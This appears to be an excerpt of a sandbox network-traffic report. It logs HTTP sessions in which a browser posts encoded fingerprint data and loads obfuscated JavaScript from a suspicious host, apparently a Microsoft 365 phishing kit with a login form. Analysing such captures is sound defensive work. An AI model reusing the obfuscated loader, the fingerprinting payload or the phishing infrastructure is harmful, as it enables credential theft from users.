                                                                              2024-10-26 06:48:44 UTC16384OUTData Raw: 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65
                                                                              Data Ascii: LHttpRequest%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Writable
                                                                              2024-10-26 06:48:44 UTC16384OUTData Raw: 6e 2b 53 56 47 41 6e 67 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 70 6f 6e 73 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 70 6f 6e 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76
                                                                              Data Ascii: n+SVGAngle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAElement%22%3A%22function+SVGAElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Response%22%3A%22function+Response%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverSize%22%3A%22function+ResizeObserv
                                                                              2024-10-26 06:48:44 UTC16384OUTData Raw: 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32
                                                                              Data Ascii: aElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMenuElement%22%3A%22function+HTMLMenuElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMediaElement%22%3A%22function+HTMLMediaElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMarqueeElement%22%3A%2
                                                                              2024-10-26 06:48:44 UTC16384OUTData Raw: 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 53 69 67 6e 61 6c 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 53 69 67 6e 61 6c 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6f 66 66 73 63 72 65 65 6e 42 75 66 66 65 72 69 6e 67 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 57 65 62 41 73 73 65 6d 62 6c 79 25 32 32 25 33 41 25
                                                                              Data Ascii: 7B+%5Bnative+code%5D+%7D%22%2C%22AbortSignal%22%3A%22function+AbortSignal%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22AbortController%22%3A%22function+AbortController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22offscreenBuffering%22%3Atrue%2C%22WebAssembly%22%3A%
                                                                              2024-10-26 06:48:44 UTC16384OUTData Raw: 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 50 61 63 6b 65 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 50 61 63 6b 65 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 4f 75 74 54 72 61 6e 73 66 65
                                                                              Data Ascii: USBIsochronousOutTransferPacket%22%3A%22function+USBIsochronousOutTransferPacket%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBIsochronousOutTransferResult%22%3A%22function+USBIsochronousOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBOutTransfe
                                                                              2024-10-26 06:48:44 UTC16384OUTData Raw: 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 41 75 64 69 6f 53 6f 75 72 63 65 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 41 75 64 69 6f 44 65 73 74 69 6e 61 74 69 6f 6e 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 48 61 6e 64 6c 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 52 65 63 6f 72 64 65 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 4c 69 73 74 25 32 32
                                                                              Data Ascii: C%22MediaStreamEvent%22%2C%22MediaStreamAudioSourceNode%22%2C%22MediaStreamAudioDestinationNode%22%2C%22MediaStream%22%2C%22MediaSourceHandle%22%2C%22MediaSource%22%2C%22MediaRecorder%22%2C%22MediaQueryListEvent%22%2C%22MediaQueryList%22%2C%22MediaList%22
                                                                              2024-10-26 06:48:44 UTC16384OUTData Raw: 65 64 65 6e 74 69 61 6c 6c 65 73 73 25 32 32 25 32 43 25 32 32 73 70 65 65 63 68 53 79 6e 74 68 65 73 69 73 25 32 32 25 32 43 25 32 32 6f 6e 63 6f 6e 74 65 6e 74 76 69 73 69 62 69 6c 69 74 79 61 75 74 6f 73 74 61 74 65 63 68 61 6e 67 65 25 32 32 25 32 43 25 32 32 6f 6e 73 63 72 6f 6c 6c 65 6e 64 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 50 6c 61 79 62 61 63 6b 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 43 53 53 41 6e 69 6d 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 25 32 32 25 32 43 25 32 32 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 4d 61 6e 61 67 65 72
                                                                              Data Ascii: edentialless%22%2C%22speechSynthesis%22%2C%22oncontentvisibilityautostatechange%22%2C%22onscrollend%22%2C%22AnimationPlaybackEvent%22%2C%22AnimationTimeline%22%2C%22CSSAnimation%22%2C%22CSSTransition%22%2C%22DocumentTimeline%22%2C%22BackgroundFetchManager
                                                                              2024-10-26 06:48:44 UTC8421OUTData Raw: 66 75 6e 63 74 69 6f 6e 2b 63 6c 65 61 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 6c 6f 73 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 6c 6f 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 41 74 74 72 69 62 75 74 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 41 74 74 72 69 62 75 74 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 41 74 74 72 69 62 75 74 65 4e 53 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 41
                                                                              Data Ascii: function+clear%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22close%22%3A%22function+close%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createAttribute%22%3A%22function+createAttribute%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createAttributeNS%22%3A%22function+createA
                                                                              2024-10-26 06:48:45 UTC303INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:48:44 GMT
                                                                              Server: Apache
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Cache-Control: max-age=7200
                                                                              Expires: Sat, 26 Oct 2024 08:48:44 GMT
                                                                              Vary: Accept-Encoding
                                                                              X-Newfold-Cache-Level: 2
                                                                              Transfer-Encoding: chunked
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              2024-10-26 06:48:45 UTC378INData Raw: 31 36 65 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 51 54 56 4e 56 45 46 35 54 55 52 4a 4d 46 5a 55 55 54 42 4e 56 45 46 33 54 31 52 4a 65 41 3d 3d 27 20 76 69 63 3d 27 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56 4b 4c 6f 45 58 4d 50 55 4a 77 33 79 6e 57 75 68
                                                                              Data Ascii: 16e<!DOCTYPE html><html id='html' sti='VlZORlVqQTVNVEF5TURJMFZUUTBNVEF3T1RJeA==' vic='' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuh


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.449744184.28.90.27443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:44 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              Accept-Encoding: identity
                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                              Range: bytes=0-2147483646
                                                                              User-Agent: Microsoft BITS/7.8
                                                                              Host: fs.microsoft.com
                                                                              2024-10-26 06:48:44 UTC515INHTTP/1.1 200 OK
                                                                              ApiVersion: Distribute 1.1
                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                              Content-Type: application/octet-stream
                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                              Server: ECAcc (lpl/EF06)
                                                                              X-CID: 11
                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                              X-Ms-Region: prod-weu-z1
                                                                              Cache-Control: public, max-age=122178
                                                                              Date: Sat, 26 Oct 2024 06:48:44 GMT
                                                                              Content-Length: 55
                                                                              Connection: close
                                                                              X-CID: 2
                                                                              2024-10-26 06:48:44 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.449745192.185.209.04435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:45 UTC618OUTGET /n/jsnom.js HTTP/1.1
                                                                              Host: rieg.riegriegrieg.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:45 UTC366INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:48:45 GMT
                                                                              Server: Apache
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Last-Modified: Mon, 21 Oct 2024 10:11:55 GMT
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 100217
                                                                              Cache-Control: max-age=86400
                                                                              Expires: Sun, 27 Oct 2024 06:48:45 GMT
                                                                              Vary: Accept-Encoding
                                                                              X-Newfold-Cache-Level: 2
                                                                              Content-Type: application/javascript
                                                                              2024-10-26 06:48:45 UTC7826INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                                                              Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                                                              2024-10-26 06:48:45 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6c 6f 67 69 6e 46 6f 72 6d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 70 6f 73 69 74 69 6f 6e 3a 5c 78 32 30 61 62 73 6f 6c 75 74 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30
                                                                              Data Ascii: \x20\x20\x20.loginForm\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20position:\x20absolute;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-left:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-right:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x20auto;\x0
                                                                              2024-10-26 06:48:45 UTC8000INData Raw: 74 65 72 6e 61 6c 2d 6c 69 67 68 74 2d 64 61 72 6b 28 62 6c 61 63 6b 2c 5c 78 32 30 77 68 69 74 65 29 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 70 70 65 61 72 61 6e 63 65 3a 5c 78 32 30 74 65 78 74 66 69 65 6c 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62
                                                                              Data Ascii: ternal-light-dark(black,\x20white);\x0a\x20\x20\x20\x20\x20\x20\x20\x20letter-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20word-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20appearance:\x20textfield;\x0a\x20\x20\x20\x20\x20\x20\x20\x20b
                                                                              2024-10-26 06:48:46 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 5c 78 32 30 7b 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 68 72 69 6e 6b 6d 65 6e 75 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30
                                                                              Data Ascii: 0\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.sideBar\x20{}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.shrinkmenu1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.new1\x20{\x0a\x20
                                                                              2024-10-26 06:48:46 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                              Data Ascii: 0\x20\x20\x20\x20\x20-webkit-animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20\x20\x20\x20\x20animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x2
                                                                              2024-10-26 06:48:46 UTC8000INData Raw: 5c 78 32 30 63 6f 6c 6f 72 3a 5c 78 32 30 23 30 30 30 30 30 30 64 38 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 76 69 73 69 62 69 6c 69 74 79 3a 5c 78 32 30 68 69 64 64 65 6e 3b 5c 78
                                                                              Data Ascii: \x20color:\x20#000000d8;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.checkbox-wrapper-43\x20input[type=\x22checkbox\x22]\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20visibility:\x20hidden;\x
                                                                              2024-10-26 06:48:46 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 62 6c 6f 63 6b 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 3e 69 6d 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30
                                                                              Data Ascii: 0\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20display:\x20block;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar>img\x20{\x0a\x20\x20\x20\x20\x20\x20\x20
